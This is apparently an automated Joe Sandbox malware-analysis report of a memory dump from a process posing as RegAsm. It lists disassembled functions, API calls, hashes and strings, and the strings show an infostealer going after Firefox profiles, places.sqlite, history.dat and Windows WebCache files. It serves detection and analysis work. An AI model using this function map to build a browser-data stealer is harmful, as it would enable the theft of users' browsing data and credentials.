                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                                                                                                                  • String ID: $0.@
                                                                                                                                                                                                  • API String ID: 2758756878-1896041820
                                                                                                                                                                                                  • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                  • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                  Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                    • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                    • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                  • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                    • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                    • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                    • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                  • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                                                                                                                                                  • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                  • API String ID: 1534475566-1174173950
                                                                                                                                                                                                  • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                  • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                  Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 669240632-0
                                                                                                                                                                                                  • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                  • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                  Function 00414C2E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                  • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                    • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseFolderPathSpecialVersionmemsetwcscpy
                                                                                                                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                  • API String ID: 2925649097-2036018995
                                                                                                                                                                                                  • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                  • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                  Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                  • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                  • String ID: "%s"
                                                                                                                                                                                                  • API String ID: 1343145685-3297466227
                                                                                                                                                                                                  • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                  • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                  Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                    • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                  • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                  • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                  • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                  • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                  • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2911713577-0
                                                                                                                                                                                                  • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                  • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                  Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                                  • String ID: @ $SQLite format 3
                                                                                                                                                                                                  • API String ID: 1475443563-3708268960
                                                                                                                                                                                                  • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                  • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                  Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _wcsicmpqsort
                                                                                                                                                                                                  • String ID: /nosort$/sort
                                                                                                                                                                                                  • API String ID: 1579243037-1578091866
                                                                                                                                                                                                  • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                  • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                  Function 00413CA4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                  • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HandleModuleProcessTimes
                                                                                                                                                                                                  • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                  • API String ID: 116129598-3385500049
                                                                                                                                                                                                  • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                  • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                  Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                    • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                  • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                                                                                                                  • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                  • API String ID: 2887208581-2114579845
                                                                                                                                                                                                  • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                  • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                  Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,?), ref: 004148C3
                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3473537107-0
                                                                                                                                                                                                  • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                  • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                  Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ??3@
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 613200358-0
                                                                                                                                                                                                  • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                  • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                                                                                                                                                  Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                                  • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                                                                                                                  • API String ID: 2221118986-1725073988
                                                                                                                                                                                                  • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                  • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                                                                                                                  Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcmp
                                                                                                                                                                                                  • String ID: $$8
                                                                                                                                                                                                  • API String ID: 1475443563-435121686
                                                                                                                                                                                                  • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                  • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                                                                                                                  Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                                                                                                                    • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                                                                                                                    • Part of subcall function 0040E01E: DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                                                                                                                                                                                    • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                                                                                                                    • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                                                                                                                    • Part of subcall function 0040E01E: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                                                                                                                    • Part of subcall function 0040E01E: WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                                                                                                                    • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                                                                                                                    • Part of subcall function 0040E01E: CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040E582
                                                                                                                                                                                                    • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                                                                                                                    • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                                                    • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040E5CA
                                                                                                                                                                                                    • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                    • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                    • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1979745280-0
                                                                                                                                                                                                  • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                  • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                                                                                                                  Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                    • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                    • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                  • memset.MSVCRT ref: 00403A55
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                                                                                                  • String ID: history.dat$places.sqlite
                                                                                                                                                                                                  • API String ID: 2641622041-467022611
                                                                                                                                                                                                  • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                  • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                                  Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00417570: SetFilePointer.KERNEL32(?,?,?,00000000), ref: 00417591
